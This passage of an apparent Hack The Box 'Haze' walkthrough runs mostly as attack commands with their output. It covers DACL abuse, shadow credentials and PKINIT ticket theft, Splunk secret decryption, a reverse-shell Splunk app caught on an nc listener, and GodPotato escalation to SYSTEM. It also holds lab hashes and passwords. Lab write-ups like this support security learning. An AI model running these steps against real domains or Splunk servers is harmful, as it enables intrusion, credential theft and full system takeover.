└─$ impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'Haze-IT-Backup$' haze.htb/'Haze-IT-Backup$' -hashes :4de830d1d58c14e241aff55f82ecdba1 -dc-ip 10.10.11.61
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250622-150331.bak
[*] DACL modified successfully!Now Haze-IT-Backup$ has full control over SUPPORT_SERVICES we can add ourselves to SUPPORT_SERVICES
└─$ bloodyAD --host 10.10.11.61 -d HAZE.htb -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' add groupMember SUPPORT_SERVICES 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to SUPPORT_SERVICESShadow Credentials
we will use https://github.com/ShutdownRepo/pywhisker.git for shadow credentials
└─$ python3 ./pywhisker.py -d "haze.htb" -u "Haze-IT-Backup$" -H "4de830d1d58c14e241aff55f82ecdba1" --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: dce8fcca-0909-fd32-ec64-a49f22908dae
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: wWY9OlFa.pfx
[+] PFX exportiert nach: wWY9OlFa.pfx
[i] Passwort für PFX: L3oq6tfwmifew1Nbn7Pm
[+] Saved PFX (#PKCS12) certificate & key at path: wWY9OlFa.pfx
[*] Must be used with password: L3oq6tfwmifew1Nbn7Pm
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtoolsNow let’s use https://github.com/dirkjanm/PKINITtools
└─$ python3 gettgtpkinit.py -cert-pfx 'wWY9OlFa.pfx' -pfx-pass 'L3oq6tfwmifew1Nbn7Pm' "haze.htb"/'edward.martin' 'edward.ccache'
2025-06-22 23:33:01,872 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-22 23:33:02,284 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-22 23:33:03,242 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-22 23:33:03,242 minikerberos INFO 1f1c7507edbc0aafc6f26dcd6fcbec522458f5c5cf549fed52257d15982d98db
INFO:minikerberos:1f1c7507edbc0aafc6f26dcd6fcbec522458f5c5cf549fed52257d15982d98db
2025-06-22 23:33:03,246 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
Using this TGT, we can grab our NT hash:
Setting Environment Variables
└─$ netexec smb 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --generate-krb5-file ./krb5.conf
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
┌──(anurag㉿anurag)-[~/htb/Haze/PKINITtools]
└─$ export KRB5_CONFIG=./krb5.conf
└─$ export KRB5CCNAME=edward.ccache
now we winrm via cache file
└─$ evil-winrm -i dc01.haze.htb -k -f edward.ccache -r haze.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: Useless cert/s provided, SSL is not enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents> and we have user.txt
Privilege Escalation
Shell as Alexander. Green
Extracting cred from Splunk auth
found a backup zip
*Evil-WinRM* PS C:\Backups\Splunk> dir
Directory: C:\Backups\Splunk
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/6/2024 3:22 PM 27445566 splunk_backup_2024-08-06.zipWe found authentication.conf file which contains bindDNpassword
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
We also found splunk.secret
└─$ find Splunk 2>/dev/null | grep splunk.secret
Splunk/etc/auth/splunk.secret
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat Splunk/etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B Now we can decrypt
└─$ splunksecrets splunk-decrypt --splunk-secret Splunk/etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24Let’s login as admin on the portal
Splunk rev shell
under “apps” → “Manage Apps” we can see there is an option to install apps via files
We will use this to get the shell, edit the run.ps1 to add our IP and port
after that zip the files and rename it
└─$ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
reverse_shell_splunk/
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/bin/run.bat
┌──(anurag㉿anurag)-[~/htb/Haze/reverse_shell_splunk]
└─$ ls
README.md reverse_shell_splunk reverse_shell_splunk.tgz
┌──(anurag㉿anurag)-[~/htb/Haze/reverse_shell_splunk]
└─$ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
now we have to install the app and wait for shell
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.61] 56055
id
PS C:\Windows\system32>
SeImpersonatePrivilege
we can see that Alexander has SeImpersonatePrivilege
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Windows\system32>
I tried for printspooler64.exe but it not work
let’s try https://github.com/BeichenDream/GodPotato
PS C:\Users\Public> .\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140732389326848
[*] DispatchTable: 0x140732391917896
[*] UseProtseqFunction: 0x140732391209792
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\15bbf199-14a0-49a5-a5a4-a457ca587973\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b402-1418-ffff-8303-caa7809cb3df
[*] DCOM obj OXID: 0xabb94c51616ed9bf
[*] DCOM obj OID: 0xeb89f4000f4cd7f1
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 932 Token:0x700 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3948Since we can get NT AUTHORITY\NETWORK SERVICE we can get the shell/ root.txt
PS C:\Users\Public> ./GodPotato-NET4.exe -cmd 'cmd /c type "C:\Users\Administrator\Desktop\root.txt"'
[*] CombaseModule: 0x140732389326848
[*] DispatchTable: 0x140732391917896
[*] UseProtseqFunction: 0x140732391209792
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\95977aec-7d51-4af5-b869-850d9faf2d99\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002402-0ad8-ffff-0b99-796f9b96b0eb
[*] DCOM obj OXID: 0x191bd70ca41753e5
[*] DCOM obj OID: 0xeaef92e998db3d97
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 932 Token:0x700 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3828
20897512e70c4967eef1c25f504d83f9
Last updated